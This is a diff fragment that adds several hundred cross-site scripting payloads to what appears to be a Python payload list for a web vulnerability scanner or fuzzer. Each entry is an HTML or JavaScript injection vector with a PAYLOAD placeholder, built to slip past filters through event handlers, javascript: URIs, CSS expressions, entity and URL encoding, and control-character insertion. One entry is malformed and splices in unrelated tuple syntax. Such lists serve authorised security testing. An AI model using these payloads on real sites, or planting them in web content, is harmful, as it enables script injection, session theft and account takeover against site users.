+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:PAYLOAD">X</a>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<event-source src="%(event)s" onload="javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javascript:javascript:PAYLOAD"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:PAYLOAD&gt;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:PAYLOAD&gt;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG SRC="javascript:javascript:PAYLOAD;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG SRC=javascript:javascript:PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG SRC=`javascript:javascript:PAYLOAD`>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<FRAMESET><FRAME SRC="javascript:javascript:PAYLOAD;"></FRAMESET>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<BODY ONLOAD=javascript:javascript:PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG SRC="jav    ascript:javascript:PAYLOAD;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:javascript:PAYLOAD;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG DYNSRC="javascript:javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG LOWSRC="javascript:javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<BGSOUND SRC="javascript:javascript:PAYLOAD;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<BR SIZE="&{javascript:PAYLOAD}">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:javascript:PAYLOAD;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>li {list-style-image: url("javascript:javascript:PAYLOAD");}</STYLE><UL><LI>X''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:PAYLOAD;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:PAYLOAD;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IFRAME SRC="javascript:javascript:PAYLOAD;"></IFRAME>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<TABLE BACKGROUND="javascript:javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<TABLE><TD BACKGROUND="javascript:javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="background-image: url(javascript:javascript:PAYLOAD)">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<DIV STYLE="width:expression(javascript:PAYLOAD);">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG STYLE="x:expr/*X*/ession(javascript:PAYLOAD)">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<XSS STYLE="x:expression(javascript:PAYLOAD)">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE TYPE="text/javascript">javascript:PAYLOAD;</STYLE>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>.XSS{background-image:url("javascript:javascript:PAYLOAD");}</STYLE><A CLASS=XSS></A>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:javascript:PAYLOAD")}</STYLE>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<BASE HREF="javascript:javascript:PAYLOAD;//">''',
+		  'browser':"""[Not Info]"""},
+		{ 'payload':"""<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:PAYLOAD></OBJECT>""",
+		  'browser':"""[O9.02]"""},
+		{ 'payload':'''<HTML xmlns:x><?import namespace="x" implementation="%(htc)s"><x:x>XSS</x:x></HTML>""","XML namespace."),("""<XML ID="x"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:PAYLOAD"&gt;</B></I></XML><SPAN DATASRC="#x" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:PAYLOAD&lt;/SCRIPT&gt;"></BODY></HTML>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<form id="test" /><button form="test" formaction="javascript:javascript:PAYLOAD">X''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onscroll=javascript:PAYLOAD><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:PAYLOAD;');}</STYLE>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:PAYLOAD&&;&&<&&/script&&>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT onreadystatechange=javascript:javascript:PAYLOAD;></SCRIPT>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:PAYLOAD;</html:script></html:html>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<embed code=javascript:javascript:PAYLOAD></embed>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onload=javascript:javascript:PAYLOAD></frameset>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<object onerror=javascript:javascript:PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:PAYLOAD;">]]</C><X></xml>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG SRC=&{javascript:PAYLOAD;};>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="jav&#65ascript:javascript:PAYLOAD">X</a>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="jav&#97ascript:javascript:PAYLOAD">X</a>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:PAYLOAD&amp;gt;>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG SRC=JaVaScRiPt:PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a onmouseover="PAYLOAD">X</a>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a onmouseover=PAYLOAD>X</a>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:PAYLOAD;">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>@im\port'\ja\vasc\ript:PAYLOAD';</STYLE>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>.X{background-image:url("javascript:PAYLOAD");}</STYLE><A CLASS=X></A>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:PAYLOAD")}</STYLE>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<XSS STYLE="xss:expression(PAYLOAD)">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<BASE HREF="javascript:PAYLOAD;//">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=`%00`&NewLine; onerror=PAYLOAD&NewLine;''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/src="data:text/html,<svg &#111;&#110;load=PAYLOAD>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; PAYLOAD" http-equiv="refresh"/>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javascript:void(0)" onmouseover=&NewLine;javascript:PAYLOAD&NewLine;>X</a>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<marquee onstart='javascript:PAYLOAD&#x28;1&#x29;'>^__^''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/%00/ src=javaSCRIPT&colon;PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<%<!--'%><script>PAYLOAD;</script -->''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script src="data:text/javascript,PAYLOAD"></script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/onreadystatechange=PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg/onload=PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<input type="text" value=`` <div/onmouseover='PAYLOAD'>X</div>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''http://www.<script>PAYLOAD</script .com''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg><script ?>PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=`xx:xx`onerror=PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<meta http-equiv="refresh" content="0;javascript&colon;PAYLOAD"/>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script>+-+-1-+-+PAYLOAD</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body/onload=&lt;!--&gt;&#10PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script itworksinallbrowsers>/*<script* */PAYLOAD</script''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img src ?itworksonchrome?\/onerror = PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg><script onlypossibleinopera:-)> PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script x> PAYLOAD </script 1=2''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<div/onmouseover='PAYLOAD'> style="x:">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<--`<img/src=` onerror=PAYLOAD> --!>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="PAYLOAD">x</button>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''AuDiO/**/oNLoaDStaRt="(_=/**/confirm/**/(PAYLOAD))"/src><!--y''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<mArquee onStart=[~[onmouseleave(([[(alert(PAYLOAD))]]))]] ]''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img src="/" =_=" title="onerror='/**/prompt(PAYLOAD)'">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<w="/x="y>"/ondblclick=`<`[confir\u006d``]>PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a/onmousemove=alert(PAYLOAD)//>y''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<object allowscriptaccess=always><param name=code value=PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg+onload=eval(location.hash.substr(1))>#alert(PAYLOAD)''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<details/open/ontoggle=confirm('PAYLOAD')>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''</script><svg><script>alert(PAYLOAD)/&apos;''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg </onload ="1> (_=prompt,_(PAYLOAD)) "">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg 1=""onload=alert(PAYLOAD)>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<output name="jAvAsCriPt://&NewLine;\u0061ler&#116(PAYLOAD)" onclick="eval(name)">X</output>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<button onmousemove="javascript:alert(PAYLOAD)">y''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<BoDy%0AOnpaGeshoW=+window.prompt(PAYLOAD)''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a href=[0x0b]xss" onfocus=prompt(PAYLOAD) autofocus fragment="''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<isindex type=image src=1 onerror=alert(PAYLOAD)>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script>a=eval;b=alert;a(b(/ PAYLOAD/.source));</script>'">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<!'/!"/!\'/\"/--!><Input/Type=Text AutoFocus */; OnFocus=(confirm)(PAYLOAD) //>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''\u003csvg/onload=alert`PAYLOAD`\u003e''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<article xmlns ="urn:img src=x onerror=y()//" >PAYLOAD''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img / src = \ 'y \' // onerror = \ 'alert (PAYLOAD) \ '>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img/src=q onerror='new Function`al\ert\`PAYLOAD\``'>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<Html Onmouseover=(alert)(PAYLOAD) //''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(PAYLOAD);>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<scr<!--esi-->ipt>aler<!--esi-->t(PAYLOAD)</sc<!--esi-->ript>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''&#x003c;img src=1 onerror=confirm(PAYLOAD)&#x003e;''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''%26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(PAYLOAD)%26%23x003e%3B%0A''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/PAYLOAD/%2529%253E''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<x+oncut=y=prompt,y`PAYLOAD`>y''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svG x=">" onload=(PAYLOAD)``>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script/y~~~>;alert(PAYLOAD);</script/Y~~~>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<VideO/**/OnerroR=~alert("PAYLOAD")+/SrC>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<video/poster/onerror=prompt(PAYLOAD)>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<sVG/xss/OnLoaD+="window['confirm']+(PAYLOAD)">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img x/src=x /onerror="x-\u0063onfirm(PAYLOAD)">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<VidEo/oNLoaDStaRt=confirm(PAYLOAD)+/src>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<p/%0Aonmouseover%0A=%0Aconfirm(PAYLOAD)>y''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<span/onmouseover=confirm(PAYLOAD)>y''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg/onload=window.onerror=alert;throw/PAYLOAD/;//''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''%00<body onload=alert(PAYLOAD)>''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''&#00;</form><input type&#61;"date" onfocus="alert(PAYLOAD)">''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''"'`><%00img src=xxx:x onerror=javascript:alert(PAYLOAD)>>''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''%00“><script>alert(PAYLOAD)</script>''',
+    	  'browser':"""[Not Info]"""},
+        { 'payload':''''`"><%00script>javascript:alert(PAYLOAD)</script>''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''--><!-- --%21> <img src=xxx:x onerror=javascript:alert(PAYLOAD)> -->>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''%22%20onmouseover=javascript:alert(PAYLOAD)%20%22''',
+     	  'browser':"""[Not Info]"""},
+        { 'payload':'''%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(PAYLOAD);>''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''&#34;&#62;<h1/onmouseover='%0061lert(PAYLOAD)'>%00''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''&#34;&#62;<svg><style>{-o-link-source&colon;"<body/onload=confirm(PAYLOAD)>"''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''%3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(PAYLOAD)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''%3Cform%20onmouseover%3Dalert(PAYLOAD)%3E%3Cinput%20name%3Dattributes%3E''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''%3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(PAYLOAD)%3E''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''%3cimg onerror=alert(PAYLOAD) src=a%3e''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''"'`><%3Cimg src=xxx:x onerror=javascript:alert(PAYLOAD)>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':''''`"><%3Cscript>javascript:alert(PAYLOAD)</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''%3Cscript>javascript:alert(PAYLOAD)</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''"'`>Y<div style="font-family:'foo'%3Bx:expression(javascript:alert(PAYLOAD);/*';">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''"'`>Y<div style="font-family:'foo'%7Dx:expression(javascript:alert(PAYLOAD);/*';">Z>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%00expression(javascript:alert(PAYLOAD)">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%09expression(javascript:alert(PAYLOAD)">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%0Aexpression(javascript:alert(PAYLOAD)">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%0Bexpression(javascript:alert(PAYLOAD)">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%0Cexpression(javascript:alert(PAYLOAD)">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%0Dexpression(javascript:alert(PAYLOAD)">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%20expression(javascript:alert(PAYLOAD)">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x%3Aexpression(javascript:alert(PAYLOAD)">Z''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%C2%A0expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%80expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%81expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%82expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%83expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%84expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%85expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%86expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%87expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%88expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%89expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%8Aexpression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E2%80%8Bexpression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%E3%80%80expression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:%EF%BB%BFexpression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:exp%00ression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:exp%5Cression(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:expression%00(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:expression%5C(javascript:alert(PAYLOAD)">Z''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!a foo=x=`y><img alt="`><img src=x:x onerror=alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<?a foo=x=`y><img alt="`><img src=x:x onerror=alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%00javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%01javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%02javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%03javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%04javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%05javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%06javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%07javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%08javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%09javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%0Ajavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%0Bjavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%0Cjavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%0Djavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%0Ejavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%0Fjavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%10javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%11javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="123" id=x>kcf</a><script>x='javascript:alert(PAYLOAD)'//Y!;</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="123" id=x>Y</a><script>x='javascript:alert(PAYLOAD)';</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="%20javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(PAYLOAD)></a>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(PAYLOAD)></a>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="jav&#65ascript:javascript:alert(PAYLOAD)">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="jav&#97ascript:javascript:alert(PAYLOAD)">Y1</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(PAYLOAD)>Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%00cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%01cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%02cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%03cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%04cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%05cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%06cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%07cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%08cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%09cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%0Acript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%0Bcript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%0Ccript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<a href="javas%0Dcript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
+          'browser':"""[Not Info]"""},
